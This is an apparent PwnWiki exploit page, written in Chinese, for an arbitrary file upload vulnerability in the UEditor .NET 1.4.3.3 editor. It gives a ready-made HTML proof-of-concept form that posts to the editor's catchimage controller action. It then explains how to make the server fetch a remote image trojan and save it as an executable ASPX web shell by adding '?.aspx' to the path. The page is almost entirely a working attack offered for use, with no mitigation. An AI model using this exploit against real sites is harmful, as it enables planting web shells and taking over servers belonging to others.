Ueditor編輯器.NET1.4.3.3版本任意文件上傳漏洞
From PwnWiki
POC
<form action="www.XXXX.com.cn/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name="source[]"/></p> <input type="submit" value="submit"/> </form>
保存為html文件,打開後上傳框輸入遠程圖片馬test.jpg,上傳時路徑最後改為test.jpg?.aspx
